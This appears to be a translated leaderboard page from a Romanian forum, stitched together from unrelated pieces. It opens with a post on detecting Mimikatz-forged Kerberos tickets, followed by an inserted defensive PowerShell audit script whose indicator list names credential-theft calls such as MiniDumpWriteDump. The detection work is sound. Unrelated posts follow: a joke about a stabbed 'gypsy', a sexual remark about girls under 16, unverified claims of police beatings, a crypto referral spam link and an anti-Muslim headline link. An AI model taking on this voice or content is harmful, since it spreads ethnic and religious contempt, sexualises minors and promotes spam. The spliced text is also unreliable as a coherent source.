In early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently presented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was set to static values, usually containing the string “eo.oe”. As of the Mimikatz update dated 1/5/2016, forged Kerberos tickets no longer include a domain anomaly since the netbios domain name is placed in the domain component of the Kerberos ticket.
Mimikatz code diff:
More information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the Detecting Forged Kerberos Tickets section.

Full article: https://adsecurity.org/?page_id=1821
    1 point
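As an added example (not code from the ADSecurity post, from the forum post above, or from the Mimikatz project), the following PowerShell script turns the post's defensive recommendations into one read-only host check: it reads the WDigest UseLogonCredential and LSA RunAsPPL values, applies the post's expectations for each OS generation, and scans PowerShell Module Logging events (Event ID 4103 in the Microsoft-Windows-PowerShell/Operational log, which is where Module Logging writes) for the indicator strings the post lists. The function names are my own; the registry paths and indicator strings are the ones the post gives.

```powershell
# Added example (not from the ADSecurity post or the Mimikatz project): a
# read-only audit of the two registry values the post tells defenders to watch
# (WDigest UseLogonCredential, LSA RunAsPPL) and a scan of PowerShell Module
# Logging events for the indicator strings it lists. Run in an elevated
# PowerShell (v3 or newer) on the host being checked.

# Indicator strings copied from the post's "Detecting Invoke-Mimikatz" and
# "Detecting Offensive PowerShell Tools" sections.
$Indicators = @(
    'System.Reflection.AssemblyName',
    'System.Reflection.Emit.AssemblyBuilderAccess',
    'System.Runtime.InteropServices.MarshalAsAttribute',
    'System.Management.Automation.WindowsErrorReporting',
    'GetDelegateForFunctionPointer',
    'MiniDumpWriteDump',
    'TOKEN_IMPERSONATE',
    'TOKEN_DUPLICATE',
    'TOKEN_ADJUST_PRIVILEGES',
    'TOKEN_PRIVILEGES',
    'SE_PRIVILEGE_ENABLED'
)

function Get-RegistryDword {
    # Returns the DWORD value, or $null when the key or the value does not exist.
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-CredentialHardening {
    # Expected hardened state per the post: UseLogonCredential = 0 (or absent on
    # Windows 8.1 / 2012 R2 and newer, which do not create the value) and RunAsPPL = 1.
    $useLogonCred = Get-RegistryDword 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    $runAsPpl     = Get-RegistryDword 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'RunAsPPL'

    # Windows 8.1 / Server 2012 R2 report version 6.3; newer builds report higher.
    $osVersion = [version](Get-CimInstance -ClassName Win32_OperatingSystem).Version
    $modernOs  = $osVersion -ge [version]'6.3'

    $wdigestStatus = if ($useLogonCred -eq 1) {
        'ALERT: UseLogonCredential=1, clear-text passwords will be kept in LSASS'
    } elseif ($modernOs -and $null -ne $useLogonCred) {
        'REVIEW: value present on an OS that does not create it by default'
    } elseif (-not $modernOs -and $null -eq $useLogonCred) {
        'REVIEW: value missing on a pre-8.1 OS; set it to 0 (needs KB2871997)'
    } else {
        'OK'
    }
    $lsaStatus = if ($runAsPpl -eq 1) { 'OK' } else { 'REVIEW: RunAsPPL is not 1, LSASS is not a protected process' }

    [PSCustomObject]@{
        OSVersion          = $osVersion.ToString()
        UseLogonCredential = $useLogonCred
        WDigestStatus      = $wdigestStatus
        RunAsPPL           = $runAsPpl
        LsaProtection      = $lsaStatus
    }
}

function Find-SuspiciousModuleLogEvents {
    # Event ID 4103 is the Module Logging record in the
    # Microsoft-Windows-PowerShell/Operational log. Each hit lists which of the
    # indicator strings appeared in the event message.
    param([int]$MaxEvents = 5000)

    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'
        Id      = 4103
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue

    foreach ($evt in $events) {
        $hits = @($Indicators | Where-Object { $evt.Message -like "*$_*" })
        if ($hits.Count -gt 0) {
            [PSCustomObject]@{
                TimeCreated = $evt.TimeCreated
                RecordId    = $evt.RecordId
                Indicators  = ($hits -join ', ')
            }
        }
    }
}

Test-CredentialHardening | Format-List
Find-SuspiciousModuleLogEvents | Format-Table -AutoSize
```

The registry check deliberately distinguishes "value set to 1" (the condition the post calls indicative of credential theft) from "value merely present on 8.1/2012 R2 or newer" (which the post says may indicate a problem but can also be a deliberate hardening setting), so the two cases can be triaged differently. The event scan only reports hits; forward the same 4103 events to a central log server or SIEM, as the post recommends, to run the same string matching across the enterprise.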
  14. Ask for all of the client's details + phone number. The courier will need to call them if they are not at home, for example. It's no problem, I failed many times too... but that's how you learn... don't worry.
    1 point
  15. I wanted to write you something but realized quickly enough that it isn't worth it. We'd get into silly arguments. I'm deleting my initial post too.
    1 point
  16. If you find a gypsy stabbed in the back, take it from me that it's just another case of suicide! :)))))
    1 point
  17. Design exists on paper too, not just on the computer
    1 point
  18. @Che If I went by what people say on the internet I'd never have made a dime in my whole life. If the guy above only made 200 dollars in a year, it means he was pathetic at what he was doing, honestly. I treat my sites as my business, which, if I think about it, they actually are, and I work day and night on it because I feel euphoric; it's my business, and if I don't work for myself then who's going to?! I'm happy every morning when I see that something else sold overnight, and that pushes me to work more and more. This morning for example I woke up and saw that I had made another $123 WHILE I WAS SLEEPING; that's enough for me to make me work harder today. I notice that in the beginning I was more stressed about clients and how I had to talk to them, now I've got the hang of it... I build relationships with clients without even trying. Everyone will say that x is dead... or that y doesn't work anymore, let them say it, it's to your advantage... you have less competition because there are these birdbrains who listen to every rumor that flies by. All the best.
    1 point
  19. you're taking on the forum crowd... experts in quantum physics, robotics, cybernetics, civil law and great connoisseurs of fine women... (especially the ones who aren't even 16 yet)
    1 point
  20. Let me tell you how it is in Germany. They come to your home with a warrant to confiscate the "gear". Despite the fact that they have a warrant and can confiscate it for the investigation (no questions asked), they apologize for the disturbance, ask whether you agree to them taking it and whether you use encryption technologies. If you say you do, they ask whether you want to give them the passwords for access. They write all of this down and take into account whether you cooperated or not. For example, if they are looking for something related to computer fraud and find nothing, if you cooperated, they won't come after you for anything else (various applications, movies, music, etc.). If you don't cooperate, there's every chance they'll come after you for those too. With the technology it's harder; I figure that if the ones in Germany don't have it, the ones in Romania would stare at a SCSI like a dimwit at a d**k. For cryptography they have professional tools, that's guaranteed. Thinking about how developed Romania is (lol, man), and how social protection and the rights of private individuals work there, they can also do something else: they take you, give you 400 blows with a truncheon, grab a bum, pay him, put him up as a witness that he saw who knows what "cyber pilfering" and that's it. If you have documents to keep, you can keep them in the printer's flash memory or in an mp3 player. // offtopic @Paul4games: In Romania it isn't called "Politie" (police). Maybe "pulitie" or "militie", and policemen are called "militisti" =) Do you know the unit of measurement for stupidity? Well, the unit of measurement for stupidity is the "tian" and its multiples are: the decitian, the centitian and the militian.
    1 point
  21. @immun3: So the people at RSA are idiots. Not. @waingro: We're going on about cryptography without having a clue about functions? Be serious.
    1 point
  22. Whatever law may exist, nobody can ever force you "not to forget". It's simple, your answer is "I forgot the password". In practice, though, things are completely different. If they absolutely want to find something out from you, they beat you (literally) until you piss yourself for days on end, even weeks if necessary, and they'll say you inflicted the wounds on yourself in the holding cell. I stand behind what I'm saying, these aren't stories.
    1 point
  23. Free 0.01 Bitcoin. Valorbit is a new coin that you earn through promotion, through invitations. On registration you get 10000 VAL. For sharing on facebook, twitter and linkedin you get another 1000 VAL for each one. For now there is no exchange but it's being worked on; it appears on c-cex tomorrow. The coin can also be mined. It has both a browser wallet and one for windows. I recommend creating your account directly with facebook, you get more coins if it is verified with a phone number. http :// bit. ly/ 1oiFtrl
    -1 points
  24. http://fossbytes.com/muslims-support-terrorism-as-suggested-by-google/
    -1 points
This leaderboard is set to Bucharest/GMT+02:00